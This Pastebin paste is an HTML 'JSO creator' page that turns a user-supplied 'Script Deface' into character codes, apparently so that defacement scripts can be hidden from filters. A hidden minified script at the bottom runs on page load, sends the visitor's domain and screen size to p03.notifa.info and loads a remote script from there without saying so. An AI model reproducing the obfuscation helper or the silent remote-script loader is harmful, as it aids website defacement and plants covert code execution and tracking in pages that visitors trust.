Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!DOCTYPE html>
- <html>
- <head>
- <title>Script JSO Creator By Gator Bks</title>
- <script>
- function runCharCodeAt() {
- input = document.charCodeAt.input.value;
- output = "";
- for(i=0; i<input.length; ++i) {
- if (output != "") output += ", ";
- output += input.charCodeAt(i);
- }
- document.charCodeAt.output.value = output;
- }
- </script>
- </head>
- <body>
- <center>
- <font face="Courier New" size="7">Script JSO Creator By Gator Bks</font>
- <form name="charCodeAt" method="post">
- <textarea name="input" style="width: 200px;height: 100px;" placeholder="Script Deface"></textarea><br><br>
- <input type="button" onclick="runCharCodeAt()" value="Convert"><br><br>
- <textarea name="output" style="width: 200px;height: 100px;"></textarea><br><br>
- <input type="submit" name="submit" value="Create!!">
- </form>
- <br><br>
- </center>
- <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH24hvgeCFOTgZIZTxm4CgMyX5IBSx%2b9V7R9tBPdz1lY9FI8fySqgBOUtYSsJh1s6AtjX1kQCUdgHrNFRd%2bTBgU3bNS%2fwd9TncdAiUxVXJ%2beI0WQynmEHZ3H2K66i7Juien62Cnq6LI%2fEDZ1mWVGds8uZjfYKxGKk4otxi%2bnhTpnUZjyHtX1FaVlU9yXg99l53ys4zch3TegJVqDK9bCIpzfpzVWeF0LKrQlg5nXM5nP5nIs2tc4Z%2bryfedkOkt%2fLt6yeOhGWKvMGhxiF55fNIVKJCyDTtXwdWe5UPsZATqbAukCNfCw6ENbA2rtmreD12HretVpJmuFO4kat%2b3LSG7Es6PsJt9MzRTIbIsmQXA4k9gmcttMxQVhw%2ffQuNqMtKz1ydEKx0QlMEiJzVCPn7iW8Ih8l5Ahl6qeB4BMSWe9tr7f4hwLVsLtEXqaROnd4Ckhc2Hof2evQPY75%2bq8e2O1O5uip2EoGvphOnX%2fqAVF7Z4zzgX%2f5cPQfIp%2fMqhdvnILHDR3s08vTAAmvlgn%2fofWZZ4wlsf189CVFqw%2bGpkui5oCulCXg0AUa4caKUEpcPzQJLa2lYwnxkB8rZkkMmZ8wi4hfuvR89mFtIH1y%2foSxZo%2fCikw8dE%2fw%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment